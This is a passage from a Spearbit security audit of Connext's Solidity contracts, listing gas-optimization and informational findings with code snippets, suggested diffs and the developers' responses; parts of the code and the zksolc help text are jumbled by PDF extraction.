Description: The function dequeueVerified() can be optimized in the following way: (block.number - com- mitBlock >= delay) is the same as (block.number - delay >= commitBlock ) And block.number - delay is constant so it can be calculated outside of the loop. Also (x >= y) can be replaced by (!(x < y)) or (!(y > x)) to save some gas. function dequeueVerified(Queue storage queue, uint256 delay) internal returns (bytes32[] memory) { ... for (last; last >= first; ) { uint256 commitBlock = queue.commitBlock[last]; if (block.number - commitBlock >= delay) { ... } } } Recommendation: Consider changing the code to: 101 function dequeueVerified(Queue storage queue, uint256 delay) internal returns (bytes32[] memory) { ... uint256 highestAcceptableCommitBlock = block.number - delay; for (last; last >= first; ) { uint256 commitBlock = queue.commitBlock[last]; if (block.number - commitBlock >= delay) { if (!(commitBlock > highestAcceptableCommitBlock)) { ... } } + - + } Connext: Solved in PR 2228. Spearbit: Verified. +5.4.34 Cache array length for loops Severity: Gas Optimization Diamond.sol#L35, Multicall.sol#L16, StableSwap.sol#L90, LibDi- Context: SwapAdminFacet.sol#L109-L177,LibDiamond.sol#L174, amond.sol#L141, SwapUtils.sol#L216, Spoke- Connector.sol#L370, BytesUtils.sol#L108, BytesUtils.sol#L119, MerkleTrie.sol#L140, MerkleTrie.sol#L227, Merkle.sol#L20, MerklePatriciaProof.sol#L36, MerklePatriciaProof.sol#L99, MerklePatriciaProof.sol#L128, TypedMemView.sol#L813 SwapUtilsExternal.sol#L253, Merkle.sol#L113, SpokeConnector.sol#L354, LibDiamond.sol#L159, LibDiamond.sol#L116, Description: Fetching array length for each iteration generally consumes more gas compared to caching it in a variable. Recommendation: All the highlighted code above can be made gas-efficient by caching the array length. For instance: -for (uint256 i; i < xp.length; ) { +uint256 len = xp.length; +for (uint256 i; i < len; ) { Connext: Solved in PR 2434. Spearbit: Verified. +5.4.35 Use custom errors instead of encoding the error message Severity: Gas Optimization Context: TypedMemView.sol#L287-L290, TypedMemView.sol#L145, Encoding.sol#L35 Description: TypedMemView.sol replicates the functionality provided by custom error with arguments: (, uint256 g) = encodeHex(uint256(typeOf(memView))); (, uint256 e) = encodeHex(uint256(_expected)); string memory err = string( abi.encodePacked("Type assertion failed. Got 0x", uint80(g), ". Expected 0x", uint80(e)) ); revert(err); encodeHex() is only used to encode a variable for an error message. Recommendation: • Use custom errors instead of encoding variables in revert string. • Remove encodeHex() functions in favour of custom errors. 102 Connext: Solved in PR 2507. Spearbit: Verified. +5.4.36 Avoid OR with a zero variable Severity: Gas Optimization Context: TypedMemView.sol#L306, TypedMemView.sol#L328, TypedMemView.sol#L132 Description: Boolean OR operation with a zero variable is a no-op. Highlighted code above perform a boolean OR operation with a zero variable which can be avoided: newView := or(newView, shr(40, shl(40, memView))) ... newView := shl(96, or(newView, _type)) // insert type ... _encoded |= _nibbleHex(_byte >> 4); // top 4 bits Recommendation: Apply this diff: - newView := or(newView, shr(40, shl(40, memView))) + newView := shr(40, shl(40, memView)) ... - newView := shl(96, or(newView, _type)) // insert type + newView := shl(96, _type) // insert type ... - _encoded |= _nibbleHex(_byte >> 4); // top 4 bits + _encoded = _nibbleHex(_byte >> 4); // top 4 bits Connext: Solved in PR 2506. Spearbit: Verified. +5.4.37 Use scratch space instead of free memory Severity: Gas Optimization Context: TypedMemView.sol#L651, TypedMemView.sol#L667, TypedMemView.sol#L684 Description: Memory slots 0x00 and 0x20 are scratch space. So any operation in assembly that needs at most 64 bytes of memory to write temporary data can use scratch space. Functions sha2(), hash160() and hash256() use free memory to write the intermediate hash values. The scratch space can be used here since these values fit in 32 bytes. It saves gas spent on reading the free memory pointer, and memory expansion. Recommendation: Consider apply this diff which replaces the use of free memory with scratch space: 103 function sha2(bytes29 memView) internal view returns (bytes32 digest) { ... assembly { - - + - + } let ptr := mload(0x40) pop(staticcall(gas(), 2, _loc, _len, ptr, 0x20)) // sha2 pop(staticcall(gas(), 2, _loc, _len, 0x00, 0x20)) // sha2 digest := mload(ptr) digest := mload(0x00) } ... function hash160(bytes29 memView) internal view returns (bytes20 digest) { ... assembly { let ptr := mload(0x40) pop(staticcall(gas(), 2, _loc, _len, ptr, 0x20)) // sha2 pop(staticcall(gas(), 2, _loc, _len, 0x00, 0x20)) // sha2 pop(staticcall(gas(), 3, ptr, 0x20, ptr, 0x20)) // rmd160 pop(staticcall(gas(), 3, 0x00, 0x20, 0x00, 0x20)) // rmd160 digest := mload(add(ptr, 0xc)) // return value is 0-prefixed. digest := mload(0xc) // return value is 0-prefixed. - - + - + - + } } ... function hash256(bytes29 memView) internal view returns (bytes32 digest) { ... assembly { let ptr := mload(0x40) pop(staticcall(gas(), 2, _loc, _len, ptr, 0x20)) // sha2 pop(staticcall(gas(), 2, _loc, _len, 0x00, 0x20)) // sha2 pop(staticcall(gas(), 2, ptr, 0x20, ptr, 0x20)) // sha2 pop(staticcall(gas(), 2, 0x00, 0x20, 0x00, 0x20)) // sha2 digest := mload(ptr) digest := mload(0x00) - - + - + - + } } Connext: Removed the above functions in PR 2474 Spearbit: Verified. +5.4.38 Redundant checks in _processMessageFromRoot() of PolygonSpokeConnector Severity: Gas Optimization PolygonSpokeConnector.sol#L61-L74, Context: FxBaseChildTunnel.sol#L32-41 Description: The function _processMessageFromRoot() of PolygonSpokeConnector does two checks on sender, which are the same: PolygonSpokeConnector.sol#L78-L82, • validateSender(sender) checks sender == fxRootTunnel • _setMirrorConnector() and setFxRootTunnel() set fxRootTunnel = _mirrorConnector and mirrorCon- nector = _mirrorConnector • require(sender == mirrorConnector, ...) checks sender == mirrorConnector which is the same as sender == fxRootTunnel. Note: the require in _setMirrorConnector() makes sure the values can't be updated later on. So one of the checks in function _processMessageFromRoot() could be removed to save some gas and to make the code easier 104 to understand. contract PolygonSpokeConnector is SpokeConnector, FxBaseChildTunnel { function _processMessageFromRoot(..., ... require(sender == mirrorConnector, "!sender"); ... address sender, ... ) validateSender(sender) { } function _setMirrorConnector(address _mirrorConnector) internal override { require(fxRootTunnel == address(0x0), ...); setFxRootTunnel(_mirrorConnector); } } abstract contract FxBaseChildTunnel is IFxMessageProcessor { function setFxRootTunnel(address _fxRootTunnel) public virtual { ... fxRootTunnel = _fxRootTunnel; // == _mirrorConnector } modifier validateSender(address sender) { require(sender == fxRootTunnel, ...); _; } } Recommendation: Remove one of the redundant checks in _processMessageFromRoot(). Connext: Solved in PR 2521. Spearbit: Verified. +5.4.39 Consider using bitmaps in _recordOutputAsSpent() of ArbitrumHubConnector Severity: Gas Optimization Context: ArbitrumHubConnector.sol#L171-L196, Outbox.sol#L219-L235 Description: The function _recordOutputAsSpent() stores status via a mapping of booleans. However the equiv- alent function recordOutputAsSpent() of Arbritrum Nitro uses a mapping of bitmaps to store the status. Doing this saves gas. Note: this saving is possible because the index values are neatly ordered. function _recordOutputAsSpent(..., uint256 _index, ...) ... { ... require(!processed[_index], "spent"); ... processed[_index] = true; } Arbitrum version: function recordOutputAsSpent(..., uint256 index, ... ) ... { ... (uint256 spentIndex, uint256 bitOffset, bytes32 replay) = _calcSpentIndexOffset(index); if (_isSpent(bitOffset, replay)) revert AlreadySpent(index); spent[spentIndex] = (replay | bytes32(1 << bitOffset)); } Recommendation: Consider using bitmaps in _recordOutputAsSpent(). Connext: Acknowledged. Spearbit: Acknowledged. 105 +5.4.40 Move nonReentrant from process() to proveAndProcess() Severity: Gas Optimization Context: SpokeConnector.sol#L330-L376, SpokeConnector.sol#L492-L553 Description: The function process() has a nonReentrant modifier. The function process() is also internal and is only called from proveAndProcess(), so it also possible to move the nonReentrant modifier to function proveAndProcess(). This would save repeatedly setting and unsetting the status of nonReentrant, which saves gas. function proveAndProcess(...) ... { ... for (uint32 i = 0; i < _proofs.length; ) { process(_proofs[i].message); unchecked { ++i; } } } function process(bytes memory _message) internal nonReentrant returns (bool _success) { ... } Recommendation: Consider moving the nonReentrant from process() to proveAndProcess(). Note: if in the future a separation between prove() and process() is made, then the location of the nonReentrant modifier will have to be reconsidered. Connext: Solved in PR 2516. Spearbit: Verified. 5.5 Informational +5.5.1 OpenZeppelin libraries IERC20Permit and EIP712 are final Severity: Informational Context: OZERC20.sol#L10-L11, draft-IERC20Permit.sol#L5-L7, draft-EIP712.sol#L5-L7 Description: The OpenZeppelin libraries have changed IERC20Permit and EIP712 to a final version, so the final versions can be used. OZERC20.sol import "@openzeppelin/contracts/token/ERC20/extensions/draft-IERC20Permit.sol"; import {EIP712} from "@openzeppelin/contracts/utils/cryptography/draft-EIP712.sol"; draft-IERC20Permit.sol // EIP-2612 is Final as of 2022-11-01. This file is deprecated. import "./IERC20Permit.sol"; draft-EIP712.sol // EIP-712 is Final as of 2022-08-11. This file is deprecated. import "./EIP712.sol"; Recommendation: Consider changing the imports in OZERC20 to: - import "@openzeppelin/contracts/token/ERC20/extensions/IERC20Permit.sol"; + import "@openzeppelin/contracts/token/ERC20/extensions/draft-IERC20Permit.sol"; - import {EIP712} from "@openzeppelin/contracts/utils/cryptography/draft-EIP712.sol"; + import {EIP712} from "@openzeppelin/contracts/utils/cryptography/EIP712.sol"; 106 Connext: OZ latest release is 4.8.0 and it doesn't include ERC20Permit.sol. Changes to EIP712.sol in PR 2350. Spearbit: Verified. +5.5.2 Use Foundry's multi-chain tests Severity: Informational Context: nxtp contracts Description: Foundry supports multi-chain testing that can be useful to catch bugs earlier in the development process. Local multi-chain environment can be used to test many scenarios not possible on test chains or in production. Since Connectors are a critical part of NXTP protocol. Recommendation: Consider integrating Foundry's multi-chain testing. See MakerDAO PR for inspiration. Connext: Testing framework still a bit mixed, and would require more offchain changes. migration to a single framework will happen in the future. Ideally a complete Spearbit: Acknowledged. +5.5.3 Risk of chain split Severity: Informational Context: Connector.sol#L37, LibConnextStorage.sol#L145 Description: Domains are considered immutable (unless implementation contracts are redeployed). In case of chain splits, both the forks will continue having the same domain and the recipients won't be able to differentiate which source chain of the message. Recommendation: There are different ways to address this (assuming that the forks have different chain IDs): • When a chain split is observed off-chain, delete all the facets on the chain you don't want to support. • When a chain split is observed off-chain, remove all connectors on the chain you don't want to support through DomainIndex.removeDomain(). • Instead of supplying domain information on deployment, consider chain ID for EVM compatible chains. Note that non-EVM chains need to be handled separately. In the case both the forks use the same chain ID, there will generally be a risk of transaction/signature replay. However, it's highly likely one of them won't be economically successful (like in the case of the short-lived merge split). In general, it will be good to warn users during these times. Connext: Acknowledge this is a problem, but using the block.chainId is not a valid identifier in non-evm chains. Having an inconsistent identifier structure across domains seems like adding unnecessary complexity. Spearbit: Acknowledged. 107 +5.5.4 Use zkSync's custom compiler for compiling and (integration) testing Severity: Informational Context: General, compiler. Description: The protocol needs to be deployed on zkSync. For deployment, the contracts would need to be compiled with zkSync's custom compiler. The bytecode generated by the custom Solidity compiler is quite dif- ferent compared to the original compiler. One thing to note is that cryptographic functions in Solidity are being replaced/inlined to static calls to zkSync's set of system precompile contracts. Recommendation: Introduce the hardhat tooling provided by the zkSync to compile and test the protocol (locally and on their testnet). Also, note the custom compiler is in development and does not have the full feature set of complication options provided by Solidity (For example, cannot use --optimize-runs or --via-ir) zksolc -h: The zkEVM Solidity compiler 1.2.0 Compiles the given Solidity input files (or the standard input if none given or "-" is used as a file name) and outputs ,! the components specified in the options at standard output or in files in the output directory, if specified. Imports ,! are automatically read from the filesystem. Example: zksolc ERC20.sol --optimize --output-dir './build/' USAGE: zksolc [FLAGS] [OPTIONS] [--] [input-files]... FLAGS: --dump-assembly --dump-ethir --dump-evm contracts ,! --dump-llvm --dump-yul --force-evmla -h, --help --optimize --abi --asm --bin --hashes --overwrite --standard-json Dump the zkEVM assembly of all contracts Dump the Ethereal Intermediate Representation (IR) of all contracts Dump the EVM legacy assembly Intermediate Representation (IR) of all Dump the LLVM Intermediate Representation (IR) of all contracts Dump the Yul Intermediate Representation (IR) of all contracts Sets the EVM legacy assembly pipeline forcibly Prints help information Enable the LLVM bytecode optimizer Output ABI specification of the contracts Output zkEVM assembly of the contracts Output zkEVM bytecode of the contracts Output function signature hashes of the contracts Overwrite existing files (used together with -o) Switch to Standard JSON input / output mode. Reads from stdin, result is ,! written to stdout -V, --version --yul Prints version information Switch to Yul mode OPTIONS: --allow-paths Allow a given path for imports. A list of paths can be ,! supplied by --base-path of the root of ,! --combined-json ,! information. --include-path ... ,! default import separating them with a comma Use the given path as the root of the source tree instead the filesystem Output a single json document containing the specified Available arguments: abi, hashes Example: solc --combined-json abi,hashes ,! Make an additional source directory available to the 108 callback. Use this option if you want to import contracts whose location is ,! not fixed in relation to your main source tree, e.g. third-party libraries ,! installed using a package manager. Can be used multiple times. Can only be ,! used if base path has a non-empty value Direct string or file containing library addresses. Syntax: =
[, or whitespace] ... Address is interpreted as a ,! hex string prefixed by 0x Sets the LLVM optimizer options If given, creates one file per component and contract/file directory Path to the `solc` executable. By default, the one in -l, --libraries ... --llvm-opt -o, --output-dir ,! at the specified --solc ,! $PATH is used ARGS: ... The input file paths Connext: Acknowledged. Spearbit: Acknowledged. +5.5.5 Shared logic in SwapUtilsExternal and SwapUtils can be consolidated or their changes would need to be synched. Severity: Informational Context: • SwapUtilsExternal.sol#L17 • SwapUtils.sol#L18 • AmplificationUtils.sol#L13 • SwapUtils.sol#L715 Description: The SwapUtilsExternal library and SwapUtils share quite a lot of functions (events/...) logics . The main differences are: • SwapUtilsExternal.swap does not have the following check but SwapUtils.swap does: // File: connext/libraries/SwapUtils.sol#L715 require(dx == tokenFrom.balanceOf(address(this)) - beforeBalance, "no fee token support"); This is actually one of the big/important diffs between current SwapUtils and SwapUtilsExternal. Other differ- ences are: • Some functions are internal in SwapUtils, but they are external/public in SwapUtilsExternal. • AmplificationUtils is basically copied in SwapUtilsExternal and its functions have been made external. • SwapUtilsExternal does not implement exists. • SwapUtilsExternal does not implement swapInternal. • The SwapUtils's Swap struct has an extra field key as do the events in this file. • Some inconsistent formatting. 109 Recommendation: It is recommended to consolidate/refactor shared features or at least leave a note for the devs that the edits for SwapUtils and SwapUtilsExternal need to be synced. The same recommendation applies for AplificationUtils and SwapUtilsExternal. Related issue: 155 Connext: Fee token support fixed in pr 2217. And for SwapUtilsExternal and SwapUtils, they are actually used in different contracts, individual StableSwap contract and StableSwapFacet. so some functions are a bit different from each other. Spearbit: Verified and acknowledged. +5.5.6 Document why < 3s was chosen as the timestamp deviation cap for price reporting in setDirect- Price Severity: Informational Context: ConnextPriceOracle.sol#L162-L163 Description: setDirectPrice uses the following require statement to filter direct price reports by the owner. require(_timestamp - block.timestamp < 3, "in future"); Only prices with _timestamp within 3s of the current block timestamp are allowed to be registered. Recommendation: It would be best to document was to why the specific value of 3s was chosen here. And also document how this reporting system works off-chain. Is the owner an agent or a bot that sources prices and sends transactions regularly to the setDirectPrice endpoint? Connext: Introduced after the following C4 audit in Issue 205. Actually, we don't use PriceOracle in the current version. so that is out of the scope of the audit. and we don't have any off-chain infrastructure for updating price of the oracle. Spearbit: Acknowledged. +5.5.7 Document what IConnectorManager entities would be passed to BridgeFacet Severity: Informational Context: BridgeFacet.sol#L239 Description: Document what type of IConnectorManager implementations would the owner or an admin set for the s.xAppConnectionManager. The only examples in the codebase are SpokeConnectors. Recommendation: Add documentation. Connext: Acknowledged. Spearbit: Acknowledged. 110 +5.5.8 Document what an internal swap pool would look like Severity: Informational Context: • SwapAdminFacet.sol#L97-L98 • SwapAdminFacet.sol#L123 Description/Recommendation: @param _key the hash of the canonical id and domain for token Document what token here refers to, whether if it is just a general IERC20 token used in cross-chain transactions and whether it can have canonical, adopted, representation, ... versions. That would mean pools are indexed by these tokens (one pool per canonical token per chain/domain). The number of pooled tokens (let's not confuse this with the token mentioned in the above paragraph) is capped at 32. Document what a general set of pooled tokens could look like and how big they could get. Leave a comment as to why the cap of 32 was chosen. Connext: Solved and documented in PR 2488 & PR 2360. Spearbit: Verified. +5.5.9 Second nonReentrant modifier Severity: Informational Context: BridgeFacet.sol#L258-L322, BridgeFacet.sol#L337-L369 Description: A previous version of xcall() had a nonReentrant modifier. This modifier was removed to enable execute() to call xcall() to return data to the originator chain. To keep a large part of the original protec- tion it is also possible to use a separate nonReentrant modifier (which uses a different storage variable) for xcall()/xcallIntoLocal(). This way both execute and xcall()/xcallIntoLocal() can be called once at the most. function xcall(...) ... { } function xcallIntoLocal(...) ... { } function execute(ExecuteArgs calldata _args) external nonReentrant whenNotPaused returns (bytes32) { } Recommendation: Consider adding a separate nonReentrant modifier to xcall()/xcallIntoLocal(). Connext: Solved in PR 2485. Spearbit: Verified. +5.5.10 Return 0 in swapToLocalAssetIfNeeded() Severity: Informational Context: AssetLogic.sol#L110-L136 Description: The return in function swapToLocalAssetIfNeeded() could also return 0. Which is somewhat more readable and could save some gas. Note: after studying the compiler output it might not actually save gas. 111 function swapToLocalAssetIfNeeded(...) ... { if (_amount == 0) { return _amount; } ... } Recommendation: Double check is actually gas is saved and then consider changing the code to: -return _amount; +return 0; Connext: Solved in PR 2212. Spearbit: Verified. +5.5.11 Use contract.code.length Severity: Informational Context: LibDiamond.sol#L254-L260, AssetLogic.sol#L454-L468 Description: Retrieving the size of a contract is done in assembly, with extcodesize(). This can also be done in solidity which is more readable. Note: assembly might be a bit more gas efficient, especially if optimized even further: see issue "isLocalOrigin can be optimized by using a named return parameter". LibDiamond.sol function enforceHasContractCode(address _contract, string memory _errorMessage) internal view { uint256 contractSize; assembly { contractSize := extcodesize(_contract) } require(contractSize != 0, _errorMessage); } AssetLogic.sol function isLocalOrigin(address _token, AppStorage storage s) internal view returns (bool) { ... uint256 _codeSize; // solhint-disable-next-line no-inline-assembly assembly { _codeSize := extcodesize(_token) } return _codeSize != 0; } Recommendation: Consider using contract.code.length. Connext: Fixed in PR 2486. Spearbit: Verified. 112 +5.5.12 cap and liquidity tokens Severity: Informational Context: SwapUtils.sol#L869-L958 Description: The function addLiquidity() also adds tokens to the Connext Diamond contract. If these tokens are the same as canonical tokens it wouldn't play nicely with the cap on these tokens. For others tokens it might also be relevant to have a cap. function addLiquidity(...) ... { ... token.safeTransferFrom(msg.sender, address(this), amounts[i]); ... } Recommendation: Doublecheck the cap requirements in relation to liquidity tokens. Connext: There are two primary places the canonical token to be added to the system: 1. Use of xcall on canonical domain (canonical assets locked for minting on destination). 2. Providing router liquidity on the canonical domain for fast-path transfers. On the canonical domain, there is no AMM because the adopted == canonical == local. The main goal of the cap is to limit the system-wide security by putting a ceiling on the total number of next assets that can be created from the funds provided to xcall. This limit should prevent AMMs and routers from providing excess liquidity on the remote domains, as there will be no way to get the representation asset once you reach the cap. In earlier versions of this feature, we tracked the cap from both of the sources above. However, we removed the tracking from routers (2 above) since it seemed to overcomplicate things, and add to other DoS vectors (see "Malicious routers can temporarily DOS the bridge by depositing a large amount of liquidity " ). This means the cap doesn't directly represent the value locked in the system (which it wouldn't have been able to do due to remote AMMs), but keeps the core supply restriction mechanism described above. That should mean that the cap and custodied values should only be updated on execute and xcall. Updated in PR 2463. Spearbit: Verified. +5.5.13 Simplify _swapAssetOut() Severity: Informational Context: • AssetLogic.sol#L277-L333 • AssetLogic.sol#L194-L216 • PortalFacet.sol#L79-L119 Description: The function _swapAssetOut() has relative complex logic where it first checks the tokens that will be received and then preforms a swap. It prevents reverting by setting the success flag. However function repayAave- Portal() still reverts if this flag is set. The comments show this was meant for reconcile(), however repaying the Aave dept in the reconcile phase no longer exists. So _swapAssetOut() could just revert if insufficiently tokens are provided. This way it would also be more similar to _swapAsset(). This will make the code more readable and safe some gas. AssetLogic.sol 113 function _swapAssetOut(...) ... returns ( bool success, ...) { ... if (ipool.exists()) { ... // Calculate slippage before performing swap. // NOTE: This is less efficient then relying on the `swapInternalOut` revert, but makes it ,! easier // to handle slippage failures (this can be called during reconcile, so must not fail). ... if (_maxIn >= ipool.calculateSwapInv(tokenIndexIn, tokenIndexOut, _amountOut)) { success = true; amountIn = ipool.swapInternalOut(tokenIndexIn, tokenIndexOut, _amountOut, _maxIn); } } else { ... uint256 _amountIn = pool.calculateSwapOutFromAddress(_assetIn, _assetOut, _amountOut); if (_amountIn <= _maxIn) { success = true; ... amountIn = pool.swapExactOut(_amountOut, _assetIn, _assetOut, _maxIn, block.timestamp + ,! 3600); } } } function swapFromLocalAssetIfNeededForExactOut(...) { ... return _swapAssetOut(_key, _asset, adopted, _amount, _maxIn); } PortalFacet.sol function repayAavePortal(...) { ... (bool success, ..., ...) = AssetLogic.swapFromLocalAssetIfNeededForExactOut(...); if (!success) revert PortalFacet__repayAavePortal_swapFailed(); ... } Recommendation: Consider simplifying _swapAssetOut(). Connext: Solved in PR 2488. Spearbit: Verified. +5.5.14 Return default false in the function end Severity: Informational Context: MerklePatriciaProof.sol#L16 Description: verify function is missing a default return value. A return value of false can be added on the function end Recommendation: Return false at the end of function. 114 function verify( bytes memory value, bytes memory encodedPath, bytes memory rlpParentNodes, bytes32 root ) internal pure returns (bool) { ... if (traversed == 0) { return false; } pathPtr += traversed; nodeKey = bytes32(RLPReader.toUintStrict(currentNodeList[1])); } else { return false; } } return false; } Connext: This is in the polygon contracts, we will leave them as is. Spearbit: Acknowledged. +5.5.15 Change occurances of whitelist to allowlist Severity: Informational Context: General Description: In the codebase, whitelist is used to represent entities or objects that are allowed to be used or perform certain tasks. This word is not so accurate/suggestive and also can be offensive. Recommendation: We can replace all occurrences of whitelist with allowlist which actually conveys its function more clearly. For reference: draft-knodel-terminology-02#section-2.2 Connext: Solved in PR 2525. Spearbit: Verified. +5.5.16 Incorrect comment on _mirrorConnector Severity: Informational Context: SpokeConnector.sol#L155 Description: The comment on _mirrorConnector is incorrect as this does not denote address of the spoke connector Recommendation: Change the comment for _mirrorConnector to below: - * @param _mirrorConnector The address of the spoke connector. + * @param _mirrorConnector The address of the hub connector. Connext: Acknowledged. Spearbit: Acknowledged. 115 +5.5.17 addStableSwapPool can have a more suggestive name and also better documentation for the _- stableSwapPool input parameter is recommended Severity: Informational Context: • TokenFacet.sol#L210 • TokenFacet.sol#L164-L172 • TokenFacet.sol#L192-L198 Description: 1. The name suggests we are adding a new pool, although we are replacing/updating the current one. 2. _stableSwapPool needs to implement IStableSwap and it is supposed to be an external stable swap pool. It would be best to indicate that and possibly change the parameter input type to IStableSwap _stableSwap- Pool. 3. _stableSwapPool provided by the owner or an admin can have more than just 2 tokens as the @notice comment suggests. For example, the pool could have oUSDC, nextUSDC, oDAI, nextDAI, ... . Also there are no guarantees that the pooled tokens are pegged to each other. There is also a potential of having these pools have malicious or worthless tokens. What external pools does Connext team uses or is planning to use? This comment also applies to setupAsset and setupAssetWithDeployedRepresentation. Recommendation: Add documentation. Connext: Acknowledged. Spearbit: Acknowledged. +5.5.18 Setting _cap on non-canonical domains of an asset is not necessary. Severity: Informational Context: • TokenFacet.sol#L164-L172 • TokenFacet.sol#L192-L198 Description/Recommendation: When _canonical.domain != s.domain, setting/saving the supplied _cap is not necessary when calling setupAsset or setupAssetWithDeployedRepresentation. Since on non-canonical do- mains for an asset the check against _cap when adding liquidity for a router or when calling xcall... is never performed. Connext: Decided to revert when supplying a positive _cap to setupAsset or setupAssetWithDeployedRepre- sentation on a non-canonical domain. This solution is introduced in PR 2444. Also note that IERC20(canonical).balanceOf(address(this)). in the above PR when s.caps[_key] is updated s.custodied[canonical] is synced to Spearbit: Verified. 116 +5.5.19 _local has a misleading name in _addLiquidityForRouter and _removeLiquidityForRouter Severity: Informational Context: • RoutersFacet.sol#L548 • RoutersFacet.sol#L599 • RoutersFacet.sol#L520 • RoutersFacet.sol#L500 • RoutersFacet.sol#L486 • RoutersFacet.sol#L472 Description: The name for _local parameter is misleading, since it has been used in _addLiquidityForRouter (TokenId memory canonical, bytes32 key) = _getApprovedCanonicalId(_local); and in _removeLiquidityForRouter TokenId memory canonical = _getCanonicalTokenId(_local); and we have the following call flow path: AssetLogic.getCanonicalTokenId uses the adoptedToCanonical mapping first then check if the input parameter is a canonical token for the current domain, then uses representationToCanonical mapping. So here _local could be an adopted token. Recommendation: It would be best to rename _local to _asset since in other places in the codebase having the word local hints that the token is either a canonical or a representation token. Connext: _addLiquidityForRouter and _removeLiquidityForRouter are required to use only local tokens and not adopted. The changes in the following PR 2489 enforce that. Also AssetAllowlist functionality has been removed from the protocol. Therefore routers only can provide/add liquidity for approved assets. Spearbit: Verified. +5.5.20 Document _calculateSwap's and _calculateSwapInv's calculations Severity: Informational Context: • SwapUtils.sol#L545 • SwapUtils.sol#L581 • SwapUtilsExternal.sol#L582 • SwapUtilsExternal.sol#L618 Description: In _calculateSwap, the -1 in dy = xp[tokenIndexTo] - y - 1 is actually important. This is be- cause given no change in the asset balance of all tokens that already satisfy the stable swap invariant (dx = 0), getY (due to rounding errors) might return: • y = xp[tokenIndexTo] which would in turn make dy = -1 that would revert the call. This case would need to be investigated. • y = xp[tokenIndexTo] - 1 which would in turn make dy = 0 and so the call would return (0, 0). • y = xp[tokenIndexTo] + 1 which would in turn make dy = -2 that would revert the call. This case would need to be investigated. 117 And similiarly in _calculateSwapInv, doing the same analysis for + 1 in dx = x - xp[tokenIndexFrom] + 1, if getYD returns: • xp[tokenIndexFrom] +1, then dx = 2; • xp[tokenIndexFrom], then dx = 1; • xp[tokenIndexFrom] - 1, then dx = 0; Note, that the behavior is different and the call would never revert. Recommendation: It would be great to analyze and document the decision as to why + 1 and - 1 were chosen in those calculations. Connext: Acknowledged. Spearbit: Acknowledged. +5.5.21 Providing the from amount the same as the pool's from token balance, one might get a different return value compared to the current pool's to balance Severity: Informational Context: SwapUtils.sol#L426-L432 Description: Note, due to some imbalance in the asset pool, given x = xp[tokenIndexFrom] (aka, no change in asset balance of tokenIndexFrom token in the asset pool), we might see a decrease or increase in the asset balance of tokenIndexTo to bring back the pool to satisfying the stable swap invariant. One source that can introduce an imbalance is when the scaled amplification coefficient is ramping. Recommendation: It would be great to leave a comment/warning for the users/devs to make them aware of this fact. Connext: Acknowledged. Spearbit: Acknowledged. +5.5.22 Document what type 0 means for TypedMemView Severity: Informational Context: Message.sol#L94 Description: In the following line, 0 is passed as the new type for a TypedMemView bytes29 _message.slice(PREFIX_LENGTH, _message.len() - PREFIX_LENGTH, 0) But there is no documentation as to what type 0 signifies. Recommendation: Document what type 0 means for TypedMemView. Connext: Type 0 just reserves the first byte when you are manipulating the memview (since they should all be typed) -- kind of the same as a null type. Spearbit: Acknowledged. 118 +5.5.23 Mixed use of require statements and custom errors Severity: Informational Context: General Description: The codebase includes a mix of require statements and custom errors. Recommendation: For consistency and in some cases cheaper gas cost, it would be best to use custom errors throughout the whole project. Connext: Acknowledged. Spearbit: Acknowledged. +5.5.24 WatcherManager can make watchers public instead of having a getter function Severity: Informational Context: WatcherManager.sol#L18, WatcherManager.sol#L47 Description: WatcherManager has a private mapping watchers and a getter function isWatcher() to query that mapping. Since WatcherManager is not inherited by any other contract, it is safe to make it public to avoid the need of an explicit getter function. Recommendation: Consider removing isWatcher() function, making watchers public and renaming it to isWatcher. This change does not change WatcherManager's interface. If applying this recommendation, take into account if you plan to add any contract inheriting from WatcherManager. That contract will now have the ability to modify isWatcher. Connext: Solved in PR 2449. Spearbit: Verified. +5.5.25 Incorrect comment about relation between zero amount and asset Severity: Informational Context: BridgeFacet.sol#L514-L515 Description: At BridgeFacet.sol#L514, if _amount == 0, _asset is allowed to have any user-specified value. _- xcall() reverts when zero address is specified for _asset on a non-zero _amount: if (_asset == address(0) && _amount != 0) { revert BridgeFacet__xcall_nativeAssetNotSupported(); } However, according to this comment if amount is 0, _asset also has to be the zero address which is not true (since it uses IFF): _params.normalizedIn = _asset == address(0) ? 0 // we know from assertions above this is the case IFF amount == 0 : AssetLogic.normalizeDecimals(ERC20(_asset).decimals(), uint8(18), _amount); Recommendation: Update the comment to: _params.normalizedIn = _asset == address(0) ? 0 // we know from assertions above that amount is 0 IF amount == 0 : AssetLogic.normalizeDecimals(ERC20(_asset).decimals(), uint8(18), _amount); Additionally, also think whether a 0 amount transfer should be allowed for a non-zero asset. ERC20 standard allows that, so an argument can be made to allow 0 amount cross-chain transfers. However, reverting in this case results in a cleaner code. 119 Connext: Acknowledged. Spearbit: Acknowledged. +5.5.26 New Connector needs to be deployed if AMB changes Severity: Informational Context: Connector.sol#L42 Description: The AMB address is configured to be immutable. If any of the chain's AMB changes, the Connector needs to be deployed. /** * @notice Address of the AMB on this domain. */ address public immutable AMB; Recommendation: Consider removing the immutable modifier and allowing the AMB address to be updated if needed. Connext: The connectors are designed to be dropped and redeployed. Its likely a new AMB contract would require additional changes anyway. Spearbit: Acknowledged. +5.5.27 Functions should be renamed Severity: Informational Context: ArbitrumHubConnector.sol#L86, OptimismHubConnector.sol#L87, ZkSyncHubConnector.sol#L88 Description: The following functions should be renamed to be aligned with the naming convention of the fxPortal contracts. • OptimismHubConnector.processMessageFromRoot to OptimismHubConnector.processMessageFromChild • ArbitrumHubConnector.processMessageFromRoot to ArbitrumHubConnector.processMessageFromChild • ZkSyncHubConnector.processMessageFromRoot to ZkSyncHubConnector.processMessageFromChild Recommendation: Update the function names accordingly. Connext: Acknowledged. Spearbit: Acknowledged. +5.5.28 Twice function aggregate() Severity: Informational Context: Multicall.sol#L13, RootManager.sol#L185 Description: Both the contracts Multicall and RootManager have a function called aggregate(). This could be confusing. Contract Multicall doesn't seem to be used. Multicall.sol function aggregate(Call[] memory calls) public view returns (uint256 blockNumber, bytes[] memory returnData) { ... ,! } RootManager.sol 120 function aggregate(uint32 _domain, bytes32 _inbound) external whenNotPaused onlyConnector(_domain) { ... } Recommendation: Consider renaming one of the functions or deprecate contract Multicall if it isn't used. Connext: Contract Multicall is removed in PR 2373. Spearbit: Verified. +5.5.29 Careful when using _removeAssetId() Severity: Informational Context: TokenFacet.sol#L354-L383 Description: The function _removeAssetId() removes an assets. Although it is called via authorized functions, mistakes could be made. It there are any representation assets left, they are worthless as they can't be bridged back anymore (unless reinstated via setupAssetWithDeployedRepresentation()). The representation assets might also be present and 